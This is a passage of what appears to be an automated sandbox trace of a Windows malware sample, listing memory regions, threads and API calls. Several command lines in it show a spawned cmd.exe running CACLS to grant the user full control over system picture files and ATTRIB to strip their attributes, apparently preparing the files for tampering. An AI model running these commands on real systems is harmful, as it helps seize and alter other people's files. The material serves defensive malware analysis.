"\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 25629 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 25630 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 25631 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 25632 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 25633 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 25634 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Thread: id = 495 os_tid = 0xd1c Thread: id = 496 os_tid = 0xd28 Process: id = "345" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16a80" os_pid = "0xca0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "343" os_parent_pid = "0xbf4" cmd_line = "ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile15.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], 
"BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 25635 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 25636 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 25637 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 25638 start_va = 0x110000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 25639 start_va = 0x640000 end_va = 0x646fff entry_point = 0x640000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 25640 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 25641 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 25642 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 25643 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 25644 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 
region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 25645 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 25646 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 25647 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 25648 start_va = 0x190000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 25649 start_va = 0x430000 end_va = 0x43ffff entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 25650 start_va = 0x6dea0000 end_va = 0x6debcfff entry_point = 0x6dea0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 25651 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 25652 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 25653 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 25654 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: 
"c:\\windows\\system32\\kernel32.dll") Region: id = 25655 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 25656 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 25657 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 25658 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 25659 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 25660 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 25661 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 25662 start_va = 0x290000 end_va = 0x357fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 25663 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 25664 start_va = 0x76ca0000 end_va = 
0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 497 os_tid = 0xcb4 Process: id = "346" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16c20" os_pid = "0xcb0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile16.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile16.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 25665 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 25666 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 25667 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 25668 start_va = 0x190000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 25669 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: 
"c:\\windows\\system32\\cmd.exe") Region: id = 25670 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 25671 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 25672 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 25673 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 25674 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 25675 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 25676 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 25677 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 25678 start_va = 0x110000 end_va = 0x11ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 25679 start_va = 0x430000 end_va = 0x52ffff entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 25680 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: 
"c:\\windows\\system32\\winbrand.dll") Region: id = 25681 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 25682 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 25683 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 25684 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 25685 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 25686 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 25687 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 25688 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 25689 start_va = 0x290000 end_va = 0x357fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 25690 start_va = 0x76490000 end_va = 
0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 25691 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 25692 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 25693 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 25694 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 25695 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 25696 start_va = 0x530000 end_va = 0x630fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 25697 start_va = 0x640000 end_va = 0x123ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000640000" filename = "" Region: id = 25698 start_va = 0x1240000 end_va = 0x13a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001240000" filename = "" Region: id = 25699 start_va = 0x13b0000 end_va = 0x167efff entry_point = 0x13b0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 498 os_tid = 0x51c [0182.338] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x28fe9c | out: lpSystemTimeAsFileTime=0x28fe9c*(dwLowDateTime=0xa1953560, dwHighDateTime=0x1d440a9)) [0182.338] GetCurrentProcessId () returned 0xcb0 [0182.338] 
GetCurrentThreadId () returned 0x51c [0182.338] GetTickCount () returned 0x34430 [0182.338] QueryPerformanceCounter (in: lpPerformanceCount=0x28fe94 | out: lpPerformanceCount=0x28fe94*=23912823145) returned 1 [0182.340] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0182.340] __set_app_type (_Type=0x1) [0182.340] __p__fmode () returned 0x76b331f4 [0182.340] __p__commode () returned 0x76b331fc [0182.340] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0182.340] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0182.340] GetCurrentThreadId () returned 0x51c [0182.340] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x51c) returned 0x38 [0182.340] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0182.340] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0182.340] SetThreadUILanguage (LangId=0x0) returned 0x409 [0182.340] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0182.340] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x28fe2c | out: phkResult=0x28fe2c*=0x0) returned 0x2 [0182.340] VirtualQuery (in: lpAddress=0x28fe63, lpBuffer=0x28fdfc, dwLength=0x1c | out: lpBuffer=0x28fdfc*(BaseAddress=0x28f000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0182.340] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x28fdfc, dwLength=0x1c | out: lpBuffer=0x28fdfc*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0182.341] VirtualQuery (in: lpAddress=0x191000, lpBuffer=0x28fdfc, dwLength=0x1c | 
out: lpBuffer=0x28fdfc*(BaseAddress=0x191000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0182.341] VirtualQuery (in: lpAddress=0x193000, lpBuffer=0x28fdfc, dwLength=0x1c | out: lpBuffer=0x28fdfc*(BaseAddress=0x193000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0182.341] VirtualQuery (in: lpAddress=0x290000, lpBuffer=0x28fdfc, dwLength=0x1c | out: lpBuffer=0x28fdfc*(BaseAddress=0x290000, AllocationBase=0x290000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0182.341] GetConsoleOutputCP () returned 0x1b5 [0182.341] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0182.341] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0182.341] _get_osfhandle (_FileHandle=1) returned 0x7 [0182.341] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0182.341] _get_osfhandle (_FileHandle=1) returned 0x7 [0182.341] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0182.341] _get_osfhandle (_FileHandle=1) returned 0x7 [0182.341] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0182.341] _get_osfhandle (_FileHandle=0) returned 0x3 [0182.341] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0182.341] _get_osfhandle (_FileHandle=0) returned 0x3 [0182.341] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0182.342] GetEnvironmentStringsW () returned 0x440308* [0182.342] FreeEnvironmentStringsW (penv=0x440308) returned 1 [0182.342] GetEnvironmentStringsW () returned 0x440308* [0182.342] FreeEnvironmentStringsW (penv=0x440308) returned 1 [0182.342] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x28ed9c | 
out: phkResult=0x28ed9c*=0x40) returned 0x0 [0182.342] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x28eda4, lpData=0x28eda8, lpcbData=0x28eda0*=0x1000 | out: lpType=0x28eda4*=0x0, lpData=0x28eda8*=0xb8, lpcbData=0x28eda0*=0x1000) returned 0x2 [0182.342] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x28eda4, lpData=0x28eda8, lpcbData=0x28eda0*=0x1000 | out: lpType=0x28eda4*=0x4, lpData=0x28eda8*=0x1, lpcbData=0x28eda0*=0x4) returned 0x0 [0182.342] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x28eda4, lpData=0x28eda8, lpcbData=0x28eda0*=0x1000 | out: lpType=0x28eda4*=0x0, lpData=0x28eda8*=0x1, lpcbData=0x28eda0*=0x1000) returned 0x2 [0182.342] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x28eda4, lpData=0x28eda8, lpcbData=0x28eda0*=0x1000 | out: lpType=0x28eda4*=0x4, lpData=0x28eda8*=0x0, lpcbData=0x28eda0*=0x4) returned 0x0 [0182.342] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x28eda4, lpData=0x28eda8, lpcbData=0x28eda0*=0x1000 | out: lpType=0x28eda4*=0x4, lpData=0x28eda8*=0x40, lpcbData=0x28eda0*=0x4) returned 0x0 [0182.342] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x28eda4, lpData=0x28eda8, lpcbData=0x28eda0*=0x1000 | out: lpType=0x28eda4*=0x4, lpData=0x28eda8*=0x40, lpcbData=0x28eda0*=0x4) returned 0x0 [0182.342] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x28eda4, lpData=0x28eda8, lpcbData=0x28eda0*=0x1000 | out: lpType=0x28eda4*=0x0, lpData=0x28eda8*=0x40, lpcbData=0x28eda0*=0x1000) returned 0x2 [0182.342] RegCloseKey (hKey=0x40) returned 0x0 [0182.342] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x28ed9c | out: phkResult=0x28ed9c*=0x40) returned 0x0 [0182.342] RegQueryValueExW 
(in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x28eda4, lpData=0x28eda8, lpcbData=0x28eda0*=0x1000 | out: lpType=0x28eda4*=0x0, lpData=0x28eda8*=0x40, lpcbData=0x28eda0*=0x1000) returned 0x2 [0182.342] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x28eda4, lpData=0x28eda8, lpcbData=0x28eda0*=0x1000 | out: lpType=0x28eda4*=0x4, lpData=0x28eda8*=0x1, lpcbData=0x28eda0*=0x4) returned 0x0 [0182.343] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x28eda4, lpData=0x28eda8, lpcbData=0x28eda0*=0x1000 | out: lpType=0x28eda4*=0x0, lpData=0x28eda8*=0x1, lpcbData=0x28eda0*=0x1000) returned 0x2 [0182.343] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x28eda4, lpData=0x28eda8, lpcbData=0x28eda0*=0x1000 | out: lpType=0x28eda4*=0x4, lpData=0x28eda8*=0x0, lpcbData=0x28eda0*=0x4) returned 0x0 [0182.343] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x28eda4, lpData=0x28eda8, lpcbData=0x28eda0*=0x1000 | out: lpType=0x28eda4*=0x4, lpData=0x28eda8*=0x9, lpcbData=0x28eda0*=0x4) returned 0x0 [0182.343] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x28eda4, lpData=0x28eda8, lpcbData=0x28eda0*=0x1000 | out: lpType=0x28eda4*=0x4, lpData=0x28eda8*=0x9, lpcbData=0x28eda0*=0x4) returned 0x0 [0182.343] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x28eda4, lpData=0x28eda8, lpcbData=0x28eda0*=0x1000 | out: lpType=0x28eda4*=0x0, lpData=0x28eda8*=0x9, lpcbData=0x28eda0*=0x1000) returned 0x2 [0182.343] RegCloseKey (hKey=0x40) returned 0x0 [0182.343] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886390 [0182.343] srand (_Seed=0x5b886390) [0182.343] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile16.bmp\" /E /G %USERNAME%:F /C 
& ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile16.bmp\"" [0182.343] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile16.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile16.bmp\"" [0182.343] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0182.343] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x441a68, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0182.343] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0182.343] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0182.343] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0182.343] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0182.343] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0182.343] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0182.343] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0182.344] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0182.344] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0182.344] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0182.344] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0182.344] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0182.344] GetEnvironmentStringsW () 
returned 0x442458* [0182.344] FreeEnvironmentStringsW (penv=0x442458) returned 1 [0182.344] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0182.344] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0182.344] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0182.344] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0182.344] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0182.344] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0182.344] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0182.344] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0182.344] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0182.344] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0182.344] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x28fb68 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0182.344] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x28fb68, lpFilePart=0x28fb64 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x28fb64*="Desktop") returned 0x18 [0182.344] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0182.344] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x28f8e4 | out: lpFindFileData=0x28f8e4) returned 0x440ae8 [0182.344] FindClose (in: hFindFile=0x440ae8 | out: hFindFile=0x440ae8) returned 1 [0182.345] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x28f8e4 | out: lpFindFileData=0x28f8e4) returned 